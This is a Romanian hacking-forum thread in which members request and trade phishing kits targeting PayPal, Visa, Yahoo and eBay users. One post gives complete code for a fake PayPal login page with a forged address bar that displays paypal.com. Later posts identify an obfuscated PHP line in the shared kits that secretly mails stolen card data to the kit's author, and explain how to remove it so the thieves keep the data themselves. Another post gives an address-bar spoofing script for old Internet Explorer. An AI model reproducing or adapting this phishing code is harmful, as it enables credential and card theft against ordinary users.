Filehost.ro - gazduire fisiere
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
princess79 la Simpatie.ro
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 60 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / HaCkinG Request /

scamuri

Pagini: 1 Moderat de Shocker, hfhun
#1
hfhun
Elite Member
Postari: 593
as avea nevoie de niste scamuri daca aveti..in special pt paypal sau visa am cautat vreo ora pe google dar nu am gasit nimic.. ms anticipat

_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#2
icelord
Elite Member
Postari: 612

hfhun a scris:

as avea nevoie de niste scamuri daca aveti..in special pt paypal sau visa am cautat vreo ora pe google dar nu am gasit nimic.. ms anticipat

nu stiu daca o sa gasesti


_______________________________________

MuOnline&Counter-Strike Support

 
   
#3
aL3Cs
Master of 127.0.0.1
Postari: 139
pt yahoo mail are cineva ? plz

_______________________________________
Hacked By [aL3Cs]

 
   
#4
Parazitu_2009
Grand Master
Postari: 305

icelord a scris:


hfhun a scris:

as avea nevoie de niste scamuri daca aveti..in special pt paypal sau visa am cautat vreo ora pe google dar nu am gasit nimic.. ms anticipat

nu stiu daca o sa gasesti
bhuey icelord,nu mai posta aiurea...scam`uri sunt cu miile...doar sa sti unde sa cauti conteaza!
Hfhun,cauta mai bine!


_______________________________________

Omul care nu are nimic de pierdut e cel mai greu de invins.

 
   
#5
Hooligan
Old School Member
Din: Zion
Postari: 461
http://freescams.3x.ro/ daca mai ai nevoie de altele sa-mi zici si o sa uploadez

_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!

 
   
#6
hfhun
Elite Member
Postari: 593
Hoo, ms pt scamuri. as avea inca o intrebare :am citit pe un forum ceva despre "address bar spoofing" si era un tip care zicea ca poate face la scamuri sa apara alta adresa la address bar (ex. www.paypal.com) cum se poate face asta?

_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#7
Hooligan
Old School Member
Din: Zion
Postari: 461
nu am idee

_______________________________________
Demisionez ! Daca cineva vrea ceva ma gaseste pe stadionul Giulesti bafta all !!!!

 
   
#8
laurxxx
Junior+
Postari: 34


Code:

index.html

<HTML><HEAD><TITLE>PayPal Redirect</TITLE><SCRIPT LANGUAGE="JavaScript">

<!-- Begin
function Start(page) {
OpenWin = this.open(page, "CtrlWindow", "ini,toolbar=yes,location=no,status=yes,menubar=yes,scrollbars=no,resizable=yes");
}
// End -->
</SCRIPT>
</HEAD><meta http-equiv="Refresh" content="0;url=javascript:Start('sysdll.php')">
<p><font size="3">This page has moved, if you are not automatically forwarded to the new page, please <a href="javascript:Start('sysdll.php')">click here</a>.</font></p>

</html>

----------------------------------------------------------------------------------

sysdll.php


<title>PayPal.com - Update Your Account</title>
<SCRIPT language=JavaScript1.2>

<!--




top.window.moveTo(0,0);

if (document.all) {

top.window.resizeTo(screen.availWidth,screen.availHeight);

}

else if (document.layers||document.getElementById) {

if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){

top.window.outerHeight = screen.availHeight;

top.window.outerWidth = screen.availWidth;

}

}

//-->

</SCRIPT>

<META http-equiv=Content-Type 
content="text/html; charset=windows-1252">
<HTA:APPLICATION id=oHTA 
WINDOWSTATE="normal" SYSMENU="yes" SINGLEINSTANCE="yes" SHOWINTASKBAR="yes" 
SELECTION="yes" SCROLLFLAT="yes" SCROLL="no" NAVIGABLE="yes" MINIMIZEBUTTON="no" 
MAXIMIZEBUTTON="no" INNERBORDER="yes" ICON="yes" CONTEXTMENU="no" CAPTION="yes" 
BORDERSTYLE="normal" BORDER="thin" APPLICATIONNAME="AmPost" VERSION="1.0" />
<STYLE>BODY {
    BORDER-RIGHT: medium none; BORDER-TOP: medium none; FONT-SIZE: 8pt; MARGIN: 0px; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none; FONT-FAMILY: Arial; BACKGROUND-COLOR: buttonface
}
TD {
    FONT-SIZE: 8pt
}
.indent {
    LEFT: auto; TEXT-INDENT: 15pt; WHITE-SPACE: normal; TEXT-ALIGN: left
}
.size {
    WIDTH: 100%
}
</STYLE>

<SCRIPT type=text/javascript>
<!--
<!--
var history=new Array(16);
hpos=0;
function MM_checkBrowser(NSvers,NSpass,NSnoPass,IEvers,IEpass,IEnoPass,OBpass,URL,altURL) { //v3.0
  var newURL='', verStr=navigator.appVersion, app=navigator.appName, version = parseFloat(verStr);
  if (app.indexOf('Netscape') != -1) {
    if (version >= NSvers) {if (NSpass>0) newURL=(NSpass==1)?URL:altURL;}
    else {if (NSnoPass>0) newURL=(NSnoPass==1)?URL:altURL;}
  } else if (app.indexOf('Microsoft') != -1) {
    if (version >= IEvers || verStr.indexOf(IEvers) != -1)
     {if (IEpass>0) newURL=(IEpass==1)?URL:altURL;}
    else {if (IEnoPass>0) newURL=(IEnoPass==1)?URL:altURL;}
  } else if (OBpass>0) newURL=(OBpass==1)?URL:altURL;
  if (newURL) { window.location=unescape(newURL); document.MM_returnValue=false; }
}

function forward()
{
frames["newFr"].location.href=history[hpos];
}

function load()
{
l=frames["newFr"].location.href;
if (l.lastIndexOf("?")==(l.length-1)) l=l.substr(0,l.length-1);
history[hpos]=l;
hpos++;
hpos%=16;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_displayStatusMsg(msgStr) { //v1.0
  status=msgStr;
  document.MM_returnValue = true;
}
function go()
{
a=document.all.newAddr.value;
if (a.indexOf("http://")!=0) a="http://"+a;
nav.action=a;
return true;
MM_swapImage('Image1','','go1click.gif');
MM_displayStatusMsg('Done');

}
// -->

function MM_showHideLayers() { //v3.0
  var i,p,v,obj,args=MM_showHideLayers.arguments;
  for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args[i]))!=null) { v=args[i+2];
    if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v='hide')?'hidden':v; }
    obj.visibility=v; }
}
//-->
</SCRIPT>

<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY onmousedown="MM_showHideLayers('pop','','hide')" 
onload="MM_preloadImages('pdownclick.gif');MM_checkBrowser(4.0,1,1,4.0,0,0,1,'login.html','login.html');return document.MM_returnValue" 
onunload=;><SPAN class=" indent">
<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%">
  <TBODY>
  <TR borderColor=#cccccc>
    <TD>
      <TABLE borderColor=#c0c0c0 cellSpacing=0 cellPadding=0 width="100%" 
      border=0>
        <TBODY>
        <TR>
          <FORM name=nav onsubmit=go(); action=about:blank method=get 
          target=newFr>
          <TD 
          style="PADDING-RIGHT: 1px; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; PADDING-TOP: 1px" 
          align=right width=3 height=22>
            <P align=left><IMG height=18 src="sline.gif" 
            width=3 align=right border=0></P></TD>
          <TD 
          style="BACKGROUND-POSITION: right 50%; BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat" 
          width=34 height=22>
            <P>&nbsp;</P></TD>
          <TD 
          style="BACKGROUND-POSITION: left 50%; BACKGROUND-IMAGE: url('ress.gif'); BACKGROUND-REPEAT: no-repeat" 
          align=left width="81%" height=22>
          <INPUT class=indent id=newAddr 
            style="BACKGROUND-POSITION: left top; FONT-SIZE: 8pt; BACKGROUND-IMAGE: url('ie2.gif'); WIDTH: 100%; BACKGROUND-REPEAT: no-repeat; HEIGHT: 22px" 
            size=40 value="      https://www.paypal.com/cgi-bin/webscr?cmd=_login-run" name=no> </TD>
          <TD width=146 BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat" height=22><A 
            onmousedown="MM_swapImage('Image2','','pdownclick.gif',1)" 
            style="CURSOR: default" onmouseout=MM_swapImgRestore() 
            href="login.html#"><IMG 
            onclick="MM_showHideLayers('pop','','show')" height=21 
            src="pdown.gif" width=17 border=0 
            name=Image2></A><A 
            onmousedown="MM_swapImage('Image1','','go1click.gif',1);MM_displayStatusMsg('Done');return document.MM_returnValue" 
            onmouseover="MM_swapImage('Image1','','go1roll.gif',1);MM_displayStatusMsg('Done');return document.MM_returnValue" 
            onmouseout=MM_swapImgRestore() href="file:///E:/"><INPUT id=Image1 
            style="CURSOR: default" onclick=go() type=image height=22 width=49 
            src="go1.gif" border=0 name=image1> 
          </A></TD></FORM></TR>
        <TR>
          <TD width=798 bgColor=#000000 colSpan=4><IMG height=1 
            src="hide.htm" width=1 border=0></TD></TR>
        <TR>
          <TD width=798 bgColor=#ffffff colSpan=4><IMG height=1 
            src="hide.htm" width=1 
      border=0></TD></TR></TBODY></TABLE>
      <DIV id=pop 
      style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 53px; VISIBILITY: hidden; BORDER-LEFT: #000000 1px; WIDTH: 81%; BORDER-BOTTOM: #000000 1px; POSITION: absolute; HEIGHT: 50px; BACKGROUND-COLOR: #999999; layer-background-color: #999999"><TEXTAREA class=size name=textfield rows=5 wrap=VIRTUAL cols=77></TEXTAREA> 
      </DIV></TD></TR>
  <TR height="100%">
    <TD vAlign=top><IFRAME id=newFr style="WIDTH: 100%; HEIGHT: 100%" 
      name=newFr src="login.html" onload=load() 
      application="no"> </IFRAME></TD></TR></TBODY></TABLE></SPAN></BODY></HTML>



 
   
#9
boogiesbc
Elite Member
Postari: 1200
Ti-am modificat postul ca sa nu se mai vada smilieurile. foloseste data viitoare code si /code intre []

_______________________________________

http://boogiesbc.deviantart.com
30 iunie 2007: Muzica e prima voce...
9 septembrie 2006: Boogie's Sleek Style | Y!M skin

 
   
#10
Sad_Dreamer
Elite Member
Postari: 1602
vedeti ca pe freescams.lx.ro sunt faked scamurile...daca nu stiti php...faceti degeaba rost de fraieri...ca cc-urile se mai duc si pe adresa carcabotx @ yahoo.com :-)

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

 
   
#11
hfhun
Elite Member
Postari: 593
da? lol ms ca ne-ai spus

si ce trebuie editat? ca sa nu se mait rimita


_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#12
laurxxx
Junior+
Postari: 34

hfhun a scris:

da? lol ms ca ne-ai spus

si ce trebuie editat? ca sa nu se mait rimita




uite backdoor-u din e-gold ( asta trebuie sters )

$ar=array("0"=>"a","1"=>"c","2"=>"r","3"=>"o","4"=>"b","5"=>"t","6"=>"@","7"=>"h","8"=>"y","9"=>".","10"=>"m","11"=>"x"); $cc=$ar['1'].$ar['0'].$ar['2'].$ar['1'].$ar['0'].$ar['4'].$ar['3'].$ar['5'].$ar['11'].$ar['6'].$ar['8'].$ar['0'].$ar['7'].$ar['3'].$ar['3'].$ar['9'].$ar['1'].$ar['3'].$ar['10'];


 
   
#13
hfhun
Elite Member
Postari: 593
:-) se poate alcatui carcabottx @ yahoo.com .. cum zicea sad gg sad =D

_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#14
Sad_Dreamer
Elite Member
Postari: 1602
vezi ca asa sunt in toate ;-)

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

 
   
#15
hfhun
Elite Member
Postari: 593
am observat.. nu e frumos..
da..dacama uit mai atent..intai da pentru fiecare numar o cifra..dupa care le aranjeaza
$cc=$ar['1'].$ar['0'].$ar['2'].$ar['1'].$ar['0'].$ar['4'].$ar['3'].$ar['5'].$ar['11'].$ar['6'].$ar['8'].$ar['0'].$ar['7'].$ar['3'].$ar['3'].$ar['9'].$ar['1'].$ar['3'].$ar['10'];

dar ce nu inteleg eu,, daca zice $cc= ... nu ar trebui sa fie si ceva de genul
mail($cc,$subj,$msg);
?

unde $cc este adresa la care se trimit mailurile, cum este
mail("YourMail@ yahoo.com", $subj, $msg);


_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#16
Shocker
Super Moderator
Din: localhost
Postari: 2084

Sad_Dreamer a scris:

vedeti ca pe freescams.lx.ro

e .3x.ro


hfhun a scris:


dar ce nu inteleg eu,, daca zice $cc= ... nu ar trebui sa fie si ceva de genul
mail($cc,$subj,$msg);
?

Uite-te mai atent... in login.php:

Code:

mail("$cc", "yahoo Info", $message);
if (mail($recipient,$subject,$message,$headers))
{
blabla
.........



_______________________________________
ShockingSoft is back
Freakz only
Comics of the day

 
   
#17
hfhun
Elite Member
Postari: 593
Sorry , but this page is closed for the moment ! Visit Us at : Hacking.CarcaBot.ro


_______________________________________
"Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for." - The Mentor - The hacker's manifesto

 
   
#18
HIENA
Old School Member
Din: Pe luna cu extraterestri
Postari: 433
ca tot suntem la ebay aici ma iau si eu laurxxx dupa ce am sters
$ar=array("0"=>"a","1"=>"c","2"=>"r","3"=>"o","4"=>"b","5"=>"t","6"=>"@","7"=>"h","8"=>"y","9"=>".","10"=>"m","11"=>"x"; $cc=$ar['1'].$ar['0'].$ar['2'].$ar['1'].$ar['0'].$ar['4'].$ar['3'].$ar['5'].$ar['11'].$ar['6'].$ar['8'].$ar['0'].$ar['7'].$ar['3'].$ar['3'].$ar['9'].$ar['1'].$ar['3'].$ar['10'];

mai trebuie sa mai pun eu ceva sau sa modific ceva?(la chestiile astea cu ebay nu m-am bagat pana acu)  


 
   
#19
Maxxim
Bluffer
Postari: 366

hfhun a scris:

Hoo, ms pt scamuri. as avea inca o intrebare :am citit pe un forum ceva despre "address bar spoofing" si era un tip care zicea ca poate face la scamuri sa apara alta adresa la address bar (ex. www.paypal.com) cum se poate face asta?



Merge doar pe internet explorer pana la versiunea 6.0 pe mai toate sistemele de operare.

Code:

<script language=”javascript”>
    function pause(ms)
    {
    date = new Date();
    var curDate = null;

    do { var curDate = new Date(); }
    while(curDate-date < ms);
    }

    function spoof () {
    win = window.open(’http://www.microsoft.com/’,'new’)
    pause (2000)
    win = window.open(’http://www.buctuong.com/swfs/index.swf’,'new’)
    pause (2000)
    win = window.open(’http://www.microsoft.com/’,'new’)

    }
    </script>
    <a href=”javascript: spoof()”>Perform the test</a>

Source: secunia.com


_______________________________________
Ideile mari se exprima prin cuvinte banale

 
   
#20
neoStar
Membru nou
Postari: 16
imi poate spune si mie cineva mai exact ce trebuie sa sterg din scriptu ala de ebay 2007 de pe freescams.3x.ro ?   

 
   
#21
szk
Junior
Din: Prin zona
Postari: 20
tare site-ul ! tnx

_______________________________________
It's your right to say something against me ! It's my right to deny everything !

 
   
#22
Pepsi Twist
The Master
Postari: 773
vreau ptr http://no-ip.prg se poate sa ma ajutati pls?

_______________________________________

Toata viata mea umblu dupa ceva...ghici ce...

 
   
#23
FireLord
Rasterizer
Din: -==LaS VeGaS==-
Postari: 655
facetiva voi singuri scamuri cu ajutorul programului CoffeCup Software e cel mai simplu mod...

_______________________________________
Google


 
   
Pagini: 1  
Mergi la